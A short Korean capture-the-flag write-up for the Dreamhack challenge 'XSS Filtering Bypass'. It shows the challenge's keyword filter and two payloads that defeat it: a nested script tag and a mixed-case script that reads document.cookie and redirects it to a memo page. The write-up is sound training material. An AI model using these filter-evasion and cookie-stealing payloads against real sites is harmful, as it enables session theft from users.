[Dreamhack] Level 1: XSS Filtering Bypass

1. 문제

https://dreamhack.io/wargame/challenges/433

XSS Filtering Bypass

 

2. 해결과정

전반적인 코드는 드림핵 내의 xss 문제의 코드와 비슷하다. 

하지만 해당 코드는 문자열을 공백으로 필터링하는 코드가 포함되어 있다.

def xss_filter(text):
    _filter = ["script", "on", "javascript:"]
    for f in _filter:
        if f in text.lower():
            text = text.replace(f, "")
    return text

 

script를 보면 필터링한다. 

onerror 등의 태그도 사용하지 못할 것이다. 

 

vuln 페이지에서 작동이 되는 태그를 확인해보았다. 

<scrscriptipt>alert(1)</scrscriptipt>

 

위의 파라미터가 작동이 되었다. 

따라서 자바스크립트 태그는 위와 같이 우회하면 된다. 

 

하지만 vuln 페이지를 이용해 메모 페이지에 쿠키값을 출력하기 위해서는 

location.href 가 필요한데, location에도 on이 포함되어 있다. 

 

location 속성은 document 속성으로부터 접근할 수 있기 때문에 document['lcatio'+'n']으로 해당 필터링을 우회해줄 것이다. 

<ScRiPt>document['locatio'+'n'].href = "/memo?memo="+document.cookie</ScRiPt>

 

성공